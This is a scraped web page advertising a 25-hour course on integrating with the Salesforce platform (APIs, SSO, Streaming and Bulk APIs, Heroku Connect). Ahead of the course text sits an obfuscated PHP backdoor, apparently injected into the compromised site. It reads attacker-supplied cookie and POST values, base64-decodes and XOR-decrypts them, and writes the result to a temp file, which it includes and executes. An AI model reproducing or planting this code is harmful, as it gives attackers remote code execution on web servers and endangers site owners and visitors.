$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Integrating With The Salesforce Platform|Grupo Loyal

Integrating With The Salesforce Platform

Integrating with the Salesforce Platform covers the key elements of how to design and implement all types of integrations with the Salesforce platform. The course introduces the major integration mechanisms available on the Salesforce platform, such as the APIs and the built-in declarative functionalities. Participants explore the technologies that play critical roles in integrating with the platform, including the SOAP and REST APIs, Apex, the Streaming API, and outbound messaging. Cutting-edge integrations, such as integrating with Amazon’s Alexa, Facebook’s Messenger platform, and Heroku are also covered.

Note: To get the most out of this course, you should be comfortable reading and writing object-oriented code.

Objetivos

When you complete this course, you will be able to:

Identify various integration techniques.
Develop methods for integrating with the Salesforce platform.
Identify the advantages of various integration techniques.
Integrate with the Salesforce platform web services.
Build custom web services.
Integrate with the Streaming and Bulk APIs.
Use Salesforce Connect and Heroku Connect to implement declarative integrations.
Implement single sign-on, social sign-on, and social customer service.
Embed external applications into the Salesforce user interface using Force.com Canvas.

Administración y programación bases de datos

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
25 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Integrating with the Salesforce Platform is ideal for customer developers, system integrators, architects, and independent software vendors (ISVs) new to the platform who want to learn how to design and build integrations with the Salesforce platform cloud applications.

Conocimientos requeridos

It is not necessary to be a Salesforce platform developer to take this course; however, we recommend that participants be familiar with the Salesforce platform and proficient in an object-oriented programming language such as Java or C#. Familiarity with JavaScript frameworks, such as Node.js, is also recommended, but not required.

Temario

You will discover the following topics:

Integration Overview

Assessing Your Architectural Landscape
Evaluating business problems from an integration perspective
An introduction to working with the Salesforce APIs
Security

Salesforce Platform security
Salesforce Identity and Single Sign-on

Introduction to Salesforce Identity and Single Sign-on
Single Sign-on using SAML
Single Sign-on Delegated Authentication
Social Sign-on
Working with Salesforce Data

sObjects and relationships
SOQL
SOSL
SOAP API

The Architecture
Working with the SOAP API
Working with the partner WSDL
Debugging and testing
JSON

JSON Basics
JSON and Java
JSON and C#
REST APIs

An introduction to the Salesforce REST APIs
The REST API
Integrating with Facebook Messenger and Amazon Alexa

Integrating the Salesforce platform with Amazon Alexa
Salesforce Bot for Facebook Messenger
Bulk API

An overview of the Bulk API
Using the Bulk API to modify data
Querying with the Bulk API
Bulk API 2.0
Streaming API

The architecture
Working with the PushTopic Streaming API
Understanding Message Durability
Working with the Generic Streaming API
Key Streaming API facts
Declarative Integration Features

Outbound messaging
Salesforce Connect
Salesforce to Salesforce
Social Customer Service
Integrating Using Heroku Connect

Integrating with an RDBMS
Using the Data Loader as an Integration Client

Data Loader overview
Including Data Loader in architecture
Apex and Integration

Introduction to Apex
Custom Apex web services
Apex callouts
Email services
Embedding Web Pages and Applications within Salesforce

Designing for Salesforce and the Salesforce1 mobile application
Mashups and Visualforce
Canvas
Computer Telephony Integration (CTI)

Computer Telephony Integration
Design Workshop

Review
Architecting a solution

Solicita información del curso

It Formacion

It Formacion